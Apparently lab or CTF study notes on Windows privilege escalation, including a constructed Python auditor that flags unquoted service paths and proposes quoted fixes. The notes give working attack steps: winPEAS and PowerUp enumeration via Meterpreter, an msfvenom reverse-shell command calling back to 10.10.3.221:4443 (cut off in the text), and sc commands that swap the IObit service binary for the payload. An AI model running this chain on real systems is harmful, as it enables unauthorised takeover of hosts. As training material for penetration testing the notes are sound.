Windows Priv esc
Check if we are admin

Living off the land: GTFOBins for Windows
Enumeration with winPEAS
wget downloads HTML from a GitHub "blob" page; append ?raw=true (or use the raw URL) to get the binary itself:
wget "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe?raw=true" -O winPEASx86.exe
Enumeration with PowerUp.ps1
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
Upload the script with Metasploit (from the Meterpreter session):
upload /root/PowerSploit/Privesc/PowerUp.ps1

Now run the script with PowerShell. Note that the script has to be dot-sourced (". .\PowerUp.ps1"); running ".\PowerUp.ps1" on its own executes it in a child scope and the Invoke-AllChecks function is not available afterwards.
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks

• List services which can be configured 👍
Get-ModifiableService -Verbose

For each finding, PowerUp also prints the command to act on it.
• Unquoted Service Path 👍
Get-ServiceUnquoted -Verbose
Unquoted service path vulnerability found in:
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
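Why an unquoted path with spaces is a finding: when the service starts, CreateProcess cuts the string at each space and tries each fragment (with ".exe" appended) in turn, so every directory on that list that a standard user can write to is a problem, and the fix is to quote the ImagePath. The following is an added example, not part of these notes or of PowerUp; the service names, the helper names and the sample ImagePath values are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample ImagePath values (HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath);
# on a real host an auditor would export these from the registry or `sc qc`.
SAMPLE_SERVICES: Dict[str, str] = {
    "AdvancedSystemCareService9": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor\Quoted Service\svc.exe" -run',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
}

_EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)

def executable_part(image_path: str) -> str:
    """Return the executable path up to and including the first '.exe' (arguments dropped)."""
    m = _EXE_RE.match(image_path.strip())
    return m.group(1) if m else image_path.strip()

def is_unquoted_with_spaces(image_path: str) -> bool:
    """The weak pattern: executable path not wrapped in quotes and containing a space."""
    p = image_path.strip()
    return not p.startswith('"') and " " in executable_part(p)

def search_candidates(image_path: str) -> List[str]:
    """Paths CreateProcess tries, in order, for an unquoted path: the string is cut at each
    space and '.exe' is appended when the fragment has no extension. Each directory on this
    list must be checked for write access by non-administrators."""
    exe = executable_part(image_path)
    candidates: List[str] = []
    for i, ch in enumerate(exe):
        if ch == " ":
            frag = exe[:i]
            if "." not in frag.rsplit("\\", 1)[-1]:
                frag += ".exe"
            candidates.append(frag)
    candidates.append(exe)
    return candidates

def quoted_image_path(image_path: str) -> str:
    """The fix: wrap the executable part in double quotes, keeping any arguments."""
    p = image_path.strip()
    if p.startswith('"'):
        return p
    exe = executable_part(p)
    return f'"{exe}"{p[len(exe):]}'

def audit(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each weak service to the candidate paths an admin has to check for write access."""
    return {name: search_candidates(path) for name, path in services.items()
            if is_unquoted_with_spaces(path)}
```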

Now create a reverse shell payload (the command below is truncated in the original notes):
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.3.221 LPORT=4443 -e x86/shikata_ga_nai -
Now upload the malicious file, drop from Meterpreter to a shell, stop the service, copy the file to the same location, start a listener on port 4443 and start the service again.
upload ASCService.exe
shell
sc stop AdvancedSystemCareService9
copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9

and we get the reverse shell.

Windows compiled exploits